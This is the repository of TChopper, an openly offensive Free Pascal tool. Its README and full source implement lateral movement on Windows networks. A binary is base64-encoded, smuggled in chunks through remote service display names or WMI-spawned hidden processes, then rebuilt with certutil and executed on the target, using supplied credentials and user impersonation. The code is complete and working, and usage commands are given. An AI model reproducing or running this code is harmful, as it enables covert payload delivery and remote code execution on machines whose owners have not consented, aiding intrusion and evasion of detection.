├── README.md
├── chopper.lpi
├── chopper.lpr
├── chopper.lps
└── release
└── chopper.exe
/README.md:
--------------------------------------------------------------------------------
1 | # TChopper
2 |
3 | New technique I have discovered recently and give it a nickname (Chop chop) to perform lateral movement using windows services display name and WMI by smuggling the malicious binary as base64 chunks and automate the process using the TChopper tool.
4 |
5 | [](https://twitter.com/zux0x3a/status/1402327825139441666)
6 |
7 | 
8 |
9 | ## How it works
10 |
11 | * the tool will get the file you willing to smuggle and encode the file as base64 into memory stream
12 | * divide the length of each line to fit 150-250 character length (250 is maximum allowed space for service lpDisplayname parameter https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea).
13 | * for chop chop attack it will create a unique service for each segmented chunk => start the service => then delete it to avoid duplicates or you can choose
14 | to only modify the service attack mode to be more faster and stable by choosing attack mode option (**-m**)
15 | * later on, it will modify service lpbinarypath parameter with required command line to grab service display name and pip out the results into tmp_payload.txt
16 | * finally, after finishing delivering all chuncks of the file as base64, the tool will create another service to decode the content into valid executbale and run it
17 |
18 | while if you are conducting lateral movment using WMI technique you can also use Chopper to do that
19 | * Tchopper will authenticate you session using WMI
20 | * creation of multiple process and use powershell unique command to pip out each segment to c:\users\public\chop.enc
21 | * create final process to use certutil to decode the content into binary and execute it
22 |
23 | 
24 |
25 | ## Usage
26 |
27 | ```
28 | #chop chop mode
29 | chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
30 |
31 |
32 | # chop chop done
33 | chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
34 |
35 | # use WMI to smuggle
36 | chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
37 | ```
38 |
39 | https://youtu.be/xbvhzHul7w0
40 |
41 | ## Detailed research
42 | http://0xsp.com/security%20research%20&%20development%20(SRD)/smuggling-via-windows-services-display-name-lateral-movement
43 |
44 | ## Show support
45 |
46 | i create offsec tools for open-source community, show your support https://paypal.me/0xsp
47 |
48 |
--------------------------------------------------------------------------------
/chopper.lpi:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
--------------------------------------------------------------------------------
/chopper.lpr:
--------------------------------------------------------------------------------
1 | program chopper;
2 |
3 | {$mode Delphi}
4 |
5 | uses
6 | {$IFDEF UNIX}{$IFDEF UseCThreads}
7 | cthreads,
8 | {$ENDIF}{$ENDIF}
9 | Classes, SysUtils,jwawinsvc, windows,base64,comobj,activex,variants,CustApp
10 | { you can add units after this };
11 |
12 | const
13 | wbemFlagForwardOnly = $00000020;
14 | HIDDEN_WINDOW = 0;
15 |
16 |
17 |
18 | type
19 |
20 | { Tchopper }
21 |
22 | Tchopper = class(TCustomApplication)
23 | protected
24 | procedure DoRun; override;
25 | public
26 | constructor Create(TheOwner: TComponent); override;
27 | destructor Destroy; override;
28 | procedure chop_chop; virtual;
29 | procedure chop_done; virtual;
30 | procedure s_wmi;virtual;
31 | procedure usage; virtual;
32 | end;
33 |
34 | { Tchopper }
35 |
36 | procedure Tchopper.DoRun;
37 | var
38 | ErrorMsg: String;
39 | begin
40 | // quick check parameters
41 | ErrorMsg:=CheckOptions('s t u p d f m w', 'chop target username password domain filename chd wmi');
42 | if ErrorMsg<>'' then begin
43 | ShowException(Exception.Create(ErrorMsg));
44 | Terminate;
45 | Exit;
46 | end;
47 |
48 | // parse parameters
49 | if HasOption('s', 'chopchop') then begin
50 | chop_chop;
51 | Terminate;
52 | Exit;
53 | end;
54 |
55 | if hasoption('m','chd') then begin
56 |
57 | chop_done;
58 | terminate;
59 | end;
60 |
61 | if hasoption('w','wmi') then begin
62 | s_wmi;
63 | terminate;
64 | end;
65 | usage;
66 | // stop program loop
67 | Terminate;
68 | end;
69 |
70 |
71 |
72 | procedure smuggle_wmi(username,password,host,chunk:OLEVariant);
73 |
74 | var
75 | FSWbemLocator : OLEVariant;
76 | FWMIService : OLEVariant;
77 | FWbemObjectSet: OLEVariant;
78 | FWbemObject : OLEVariant;
79 | oEnum : IEnumvariant;
80 | iValue : LongWord;
81 | objProcess : OLEVariant;
82 | objConfig : OLEVariant;
83 | ProcessID : Integer;
84 | backdoor : OLEVariant;
85 | // username,password,host: OLEVariant;
86 | srvhost :string;
87 | i:integer;
88 | ssl_enabled : Boolean;
89 | begin;
90 |
91 |
92 | FSWbemLocator := CreateOleObject('WbemScripting.SWbemLocator');
93 | FWMIService := FSWbemLocator.ConnectServer(host, 'root\CIMV2', username, password);
94 | FWbemObject := FWMIService.Get('Win32_ProcessStartup');
95 | objConfig := FWbemObject.SpawnInstance_;
96 |
97 | objConfig.ShowWindow := HIDDEN_WINDOW;
98 | objProcess := FWMIService.Get('Win32_Process');
99 | objProcess.Create(chunk, null, objConfig, ProcessID);
100 | Writeln(Format('Pid %d',[ProcessID]));
101 | writeln('[+] task has been created successfully ..!');
102 |
103 | end;
104 |
105 | procedure banner;
106 | begin
107 | writeln('-----------------------------------------------------------');
108 | writeln('#1 - Smuggling binary via Service DisplayName');
109 | writeln('#2 - Smuggling binary via WMI');
110 | writeln('Research : https://bit.ly/3ipnbDT');
111 | writeln('Author : Lawrence Amer @zux0x3a , https://0xsp.com');
112 | writeln('-----------------------------------------------------------');
113 | writeln('USAGE Technique #1: '+'chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -t MACHINE -f LOCALBINARYPATH');
114 | writeln('USAGE Technique #2: '+'chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -t MACHINE -f LOCALBINARYPATH');
115 | writeln('USAGE Technique #3: '+'chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH');
116 | writeln('-----------------------------------------------------------');
117 | writeln('');
118 |
119 |
120 | end;
121 |
122 | function FileToBase64(const AFile: String; var Base64: String): Boolean;
123 | var
124 | MS: TMemoryStream;
125 | Str: String;
126 | begin
127 | Result := False;
128 | if not FileExists(AFile) then
129 | Exit;
130 | MS := TMemoryStream.Create;
131 | try
132 | MS.LoadFromFile(AFile);
133 | if MS.Size > 0 then
134 | begin
135 | SetLength(Str, MS.Size div SizeOf(Char));
136 | MS.ReadBuffer(Str[1], MS.Size div SizeOf(Char));
137 | Base64 := EncodeStringBase64(Str);
138 | Result := True;
139 | end;
140 | finally
141 | MS.Free;
142 | end;
143 | end;
144 |
145 | // thanks for https://www.swissdelphicenter.ch/
146 | function ServiceStart(
147 | sMachine,
148 | sService : string ) : boolean;
149 | var
150 |
151 | schm, schs : SC_Handle;
152 |
153 | ss : TServiceStatus;
154 | psTemp : pointer;
155 | dwChkP : DWord;
156 | hToken: Thandle;
157 | begin
158 |
159 | ss.dwCurrentState := 0;
160 |
161 | // connect to the service
162 | // control manager
163 | schm := OpenSCManager(PChar(sMachine),Nil,SC_MANAGER_CONNECT);
164 |
165 | // if successful...
166 | if(schm > 0)then
167 | begin
168 | // open a handle to
169 | // the specified service
170 | schs := OpenService(
171 | schm,
172 | PChar(sService),
173 | // we want to
174 | // start the service and
175 | SERVICE_START or
176 | // query service status
177 | SERVICE_QUERY_STATUS);
178 |
179 | // if successful...
180 | if(schs > 0)then
181 | begin
182 | psTemp := Nil;
183 | if(StartService(
184 | schs,
185 | 0,
186 | psTemp))then
187 | begin
188 | // check status
189 | if(QueryServiceStatus(
190 | schs,
191 | ss))then
192 | begin
193 | while(SERVICE_RUNNING
194 | <> ss.dwCurrentState)do
195 | begin
196 |
197 | dwChkP := ss.dwCheckPoint;
198 |
199 | Sleep(ss.dwWaitHint);
200 |
201 | if(not QueryServiceStatus(
202 | schs,
203 | ss))then
204 | begin
205 | break;
206 | end;
207 |
208 | if(ss.dwCheckPoint <
209 | dwChkP)then
210 | begin
211 | break;
212 | end;
213 | end;
214 | end;
215 | end;
216 | CloseServiceHandle(schs);
217 | end;
218 | CloseServiceHandle(schm);
219 | end;
220 | Result :=
221 | SERVICE_RUNNING =
222 | ss.dwCurrentState;
223 | end;
224 |
225 |
226 | function decoder_service(username,password,domain,sMachine, sService: PChar): DWORD;
227 | var
228 | SCManHandle, SvcHandle: SC_Handle;
229 | htoken:Thandle;
230 | SS: TServiceStatus;
231 | dwStat: DWORD;
232 | ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
233 | begin
234 |
235 |
236 | servicename := 'final_seg';
237 | servicedisplayname := 'Let me in';
238 | ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c certutil -decode -f tmp_payload.txt payload.exe & payload.exe"');
239 |
240 |
241 |
242 | hToken := 0;
243 | LogonUser(username, domain, password,
244 | LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);
245 |
246 | ImpersonateLoggedOnUser(hToken);
247 | dwStat := 0;
248 | // Open service manager handle.
249 | SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
250 | if (SCManHandle > 0) then
251 | begin
252 |
253 | SvcHandle := OpenService(SCManHandle, sService, SERVICE_QUERY_STATUS);
254 | Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);
255 |
256 | if (SvcHandle > 0) then
257 | begin
258 | // SS structure holds the service status (TServiceStatus);
259 | // servicestart;
260 | writeln('[+] executing the payload..');
261 | ServiceStart(sMachine,servicename);
262 |
263 | if (QueryServiceStatus(SvcHandle, SS)) then
264 | dwStat := ss.dwCurrentState;
265 | CloseServiceHandle(SvcHandle);
266 | end;
267 | CloseServiceHandle(SCManHandle);
268 | end;
269 | Result := dwStat;
270 | end;
271 |
272 |
273 | Function ServiceDelete(sMachine, sService: pchar): Boolean;
274 | Var
275 | schm, schs: SC_Handle;
276 | ss: TServiceStatus;
277 | dwChkP: dword;
278 | Begin
279 | Result := False;
280 | schm := OpenSCManager(PChar(sMachine), Nil, SC_MANAGER_CONNECT);
281 | If schm > 0 Then Begin
282 | schs := OpenService(schm, PChar(sService),STANDARD_RIGHTS_REQUIRED or SERVICE_STOP Or SERVICE_QUERY_STATUS);
283 | If schs > 0 Then Begin
284 | If (QueryServiceStatus(schs, ss)) Then Begin
285 | While (SERVICE_STOPPED <> ss.dwCurrentState) Do Begin
286 | ControlService(schs, SERVICE_CONTROL_STOP, ss);
287 | dwChkP := ss.dwCheckPoint;
288 | Sleep(ss.dwWaitHint);
289 | If (Not QueryServiceStatus(schs, ss)) Then
290 | Break;
291 | If (ss.dwCheckPoint < dwChkP) Then
292 | Break;
293 | End;
294 | End;
295 | DeleteService(schs);
296 | CloseServiceHandle(schs);
297 | End;
298 | CloseServiceHandle(schm);
299 |
300 | // If service does not exist, then everything is fine.
301 | schm := OpenSCManager(PChar(sMachine), Nil, SC_MANAGER_CONNECT);
302 | If schm > 0 Then Begin
303 | schs := OpenService(schm, PChar(sService), SERVICE_QUERY_STATUS);
304 | If schs = 0 Then Begin
305 | If GetLastError = ERROR_SERVICE_DOES_NOT_EXIST Then
306 | Result := True;
307 | End Else Begin
308 | CloseServiceHandle(schs);
309 | End;
310 | CloseServiceHandle(schm);
311 | End;
312 | End;
313 | End;
314 |
315 | function create_tmp_service(username,password,domain,sMachine:Pchar):boolean;
316 | var
317 | SCManHandle, SvcHandle: SC_Handle;
318 | htoken:Thandle;
319 | SS: TServiceStatus;
320 | dwStat: DWORD;
321 | ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
322 | begin
323 |
324 |
325 | servicename := 'chopper';
326 | ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c powershell -command "Get-Service "'+Pchar(servicename)+'" | select -Expand DisplayName |out-file -append tmp_payload.txt"');
327 | ServiceDisplayName := 'NODATA';
328 | hToken := 0;
329 | LogonUser(username, domain, password,
330 | LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);
331 |
332 | ImpersonateLoggedOnUser(hToken);
333 | dwStat := 0;
334 |
335 |
336 | // Open service manager handle.
337 | SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
338 | if (SCManHandle > 0) then
339 | begin
340 |
341 | SvcHandle := OpenService(SCManHandle, servicename, SERVICE_QUERY_STATUS);
342 | try
343 | sleep(1); // thats will sleep for a while to make sure execution is on place
344 | Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);
345 |
346 | except on E: exception do
347 | writeln(E.Message);
348 | end;
349 | if (Svchandle > 0 ) then
350 |
351 | result := true
352 | else
353 | result := false;
354 | end;
355 | end;
356 | function modify_service(username,password,domain,sMachine:Pchar;chunk:string): Dword;
357 | var
358 | SCManHandle, SvcHandle: SC_Handle;
359 | htoken:Thandle;
360 | SS: TServiceStatus;
361 | dwStat: DWORD;
362 | ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
363 | len,numelem ,i: integer;
364 | arr : array of string;
365 | isokay,status : boolean;
366 | begin
367 |
368 | hToken := 0;
369 | LogonUser(username, domain, password,
370 | LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);
371 |
372 | ImpersonateLoggedOnUser(hToken);
373 | dwStat := 0;
374 |
375 | isokay := create_tmp_service(username,password,domain,sMachine);
376 |
377 |
378 | len := length(chunk);
379 | numelem := len div 150;
380 |
381 | if len mod 150 <>0 then
382 | inc(NumElem);
383 | setLength(arr,NumElem);
384 |
385 | for i := 0 to High(arr) do
386 | Arr[i] := copy(chunk,i * 150 + 1, 150);
387 |
388 | for i := 0 to High (arr) do begin
389 |
390 |
391 | servicename := 'chopper';
392 | servicedisplayname := pchar(Arr[i]);
393 |
394 |
395 | SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
396 | if (SCManHandle > 0) then
397 | begin
398 | SvcHandle := OpenService(SCManHandle, servicename, SERVICE_ALL_ACCESS);
399 | try
400 | sleep(1); // thats will sleep for a while to make sure execution is on place
401 | status := ChangeServiceConfigA(SvcHandle,SERVICE_NO_CHANGE,SERVICE_NO_CHANGE,SERVICE_NO_CHANGE,nil, nil, nil, nil, nil, nil,servicedisplayname)
402 | except on E: exception do
403 | writeln(E.Message);
404 | end;
405 | if (status) then
406 | begin
407 | // servicestart;
408 | writeln('[+] Service modified with the payload chunk');
409 | ServiceStart(sMachine,servicename);
410 |
411 | if (QueryServiceStatus(SvcHandle, SS)) then
412 | dwStat := ss.dwCurrentState;
413 | CloseServiceHandle(SvcHandle);
414 | end;
415 | CloseServiceHandle(SCManHandle);
416 | end;
417 | Result := dwStat;
418 | end;
419 | end;
420 |
421 |
422 | function Get_Create_service(username,password,domain,sMachine: PChar;chunk:string): DWORD;
423 | var
424 | SCManHandle, SvcHandle: SC_Handle;
425 | htoken:Thandle;
426 | SS: TServiceStatus;
427 | dwStat: DWORD;
428 | ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
429 | len,numelem ,i,ch: integer;
430 | arr : array of string;
431 | begin
432 | ch := 0;
433 | len := length(chunk);
434 | numelem := len div 150;
435 |
436 | if len mod 150 <>0 then
437 | inc(NumElem);
438 | setLength(arr,NumElem);
439 |
440 | for i := 0 to High(arr) do
441 | Arr[i] := copy(chunk,i * 150 + 1, 150);
442 |
443 | for i := 0 to High (arr) do begin
444 | inc(ch,1);
445 |
446 | servicename := pchar('seg'+inttostr(ch));
447 | servicedisplayname := pchar(Arr[i]);
448 | ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c powershell -command "Get-Service "'+Pchar(servicename)+'" | select -Expand DisplayName |out-file -append tmp_payload.txt"');
449 |
450 |
451 |
452 | hToken := 0;
453 | LogonUser(username, domain, password,
454 | LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);
455 |
456 | ImpersonateLoggedOnUser(hToken);
457 | dwStat := 0;
458 | // Open service manager handle.
459 | SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
460 | if (SCManHandle > 0) then
461 | begin
462 |
463 | SvcHandle := OpenService(SCManHandle, servicename, SERVICE_QUERY_STATUS);
464 | try
465 | sleep(1000); // thats will sleep for a while to make sure execution is on place
466 | Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);
467 |
468 | except on E: exception do
469 | writeln(E.Message);
470 | end;
471 | if (SvcHandle > 0) then
472 | begin
473 | // SS structure holds the service status (TServiceStatus);
474 | // servicestart;
475 | ServiceStart(sMachine,servicename);
476 | ServiceDelete(sMachine,servicename);
477 |
478 | if (QueryServiceStatus(SvcHandle, SS)) then
479 | dwStat := ss.dwCurrentState;
480 | CloseServiceHandle(SvcHandle);
481 | end;
482 | CloseServiceHandle(SCManHandle);
483 | end;
484 | Result := dwStat;
485 | end;
486 | end;
487 | constructor Tchopper.Create(TheOwner: TComponent);
488 | begin
489 | inherited Create(TheOwner);
490 | StopOnException:=True;
491 | end;
492 |
493 | destructor Tchopper.Destroy;
494 | begin
495 | inherited Destroy;
496 | end;
497 | procedure Tchopper.s_wmi;
498 | var
499 | username,password,host,res,process,filename:string;
500 | i,p:integer;
501 | len,numelem: integer;
502 | arr : array of string;
503 | begin
504 |
505 | banner;
506 | writeln('Technique #3 - Smuggling via WMI');
507 | for i := 1 to paramcount do begin
508 | //check arg option
509 | if (paramstr(i)='-t') then begin
510 | host := paramstr(i+1);
511 | end;
512 | if (paramstr(i)='-u') then begin
513 | username := paramstr(i+1);
514 | end;
515 | if (paramstr(i)='-p') then begin
516 | password := paramstr(i+1);
517 | end;
518 | if (paramstr(i) ='-f') then begin
519 | filename := paramstr(i+1);
520 | end;
521 | filetobase64(filename,res);
522 |
523 | end;
524 | // loop becomes here
525 | len := length(res);
526 | numelem := len div 512;
527 |
528 | if len mod 512 <>0 then
529 | inc(NumElem);
530 | setLength(arr,NumElem);
531 |
532 | for p := 0 to High(arr) do
533 | Arr[p] := copy(res,p * 512 + 1, 512);
534 |
535 | for p := 0 to High (arr) do begin
536 |
537 | process := 'c:\windows\system32\cmd.exe /c powershell.exe -command "'''+Arr[p]+''' |out-file -append c:\Users\Public\chop.enc"';
538 | writeln(process);
539 | smuggle_wmi(username,password,host,process);
540 | end;
541 | writeln('[+] Prepare to execute ');
542 | sleep(1000);
543 |
544 | smuggle_wmi(username,password,host,'c:\windows\system32\cmd.exe /c certutil -decode -f c:\Users\Public\chop.enc c:\Users\Public\chopper.exe & c:\Users\Public\chopper.exe');
545 |
546 |
547 | end;
548 |
549 | procedure Tchopper.usage;
550 | begin
551 | banner;
552 | end;
553 |
554 |
555 |
556 | procedure Tchopper.chop_done;
557 | var
558 | username,password,domain,machine,filename:string;
559 | res:string;
560 | i:integer;
561 | begin
562 | banner;
563 | writeln('Technique #2 - Chop Done - Modify Service Display Name');
564 |
565 |
566 | for i := 1 to paramcount do begin
567 | //check arg option
568 | if (paramstr(i)='-t') then begin
569 | machine := paramstr(i+1);
570 | end;
571 | if (paramstr(i)='-u') then begin
572 | username := paramstr(i+1);
573 | end;
574 | if (paramstr(i)='-p') then begin
575 | password := paramstr(i+1);
576 | end;
577 | if (paramstr(i)='-d') then begin
578 | domain := paramstr(i+1);
579 | end;
580 | if (paramstr(i) ='-f') then begin
581 | filename := paramstr(i+1);
582 | end;
583 |
584 | end;
585 |
586 | filetobase64(filename,res);
587 | writeln('[->] sending payload..as chuncks');
588 | modify_service(pchar(username),pchar(password),pchar(domain),pchar(machine),res);
589 | decoder_service(pchar(username),pchar(password),pchar(domain),pchar(machine),'final_seg');
590 | end;
591 |
592 |
593 |
594 | procedure Tchopper.chop_chop;
595 | var
596 | username,password,domain,machine,filename:string;
597 | res:string;
598 | i:integer;
599 | begin
600 | banner;
601 | writeln('Technique #1 - Chop Chop - Create/delete');
602 |
603 |
604 | for i := 1 to paramcount do begin
605 | //check arg option
606 | if (paramstr(i)='-t') then begin
607 | machine := paramstr(i+1);
608 | end;
609 | if (paramstr(i)='-u') then begin
610 | username := paramstr(i+1);
611 | end;
612 | if (paramstr(i)='-p') then begin
613 | password := paramstr(i+1);
614 | end;
615 | if (paramstr(i)='-d') then begin
616 | domain := paramstr(i+1);
617 | end;
618 | if (paramstr(i) ='-f') then begin
619 | filename := paramstr(i+1);
620 | end;
621 |
622 | end;
623 |
624 | filetobase64(filename,res);
625 | writeln('[->] sending payload..as chuncks');
626 | Get_Create_service(pchar(username),pchar(password),pchar(domain),pchar(machine),res);
627 | decoder_service(pchar(username),pchar(password),pchar(domain),pchar(machine),'final_seg');
628 | end;
629 |
630 |
631 |
632 | var
633 | Application: Tchopper;
634 | begin
635 | Application:=Tchopper.Create(nil);
636 | Application.Title:='svc_smuggling';
637 | Application.Run;
638 | Application.Free;
639 | end.
640 |
641 |
--------------------------------------------------------------------------------
/chopper.lps:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
--------------------------------------------------------------------------------
/release/chopper.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zux0x3a/TChopper/f7383a36af813019ebefb70803dc82a842ed9273/release/chopper.exe
--------------------------------------------------------------------------------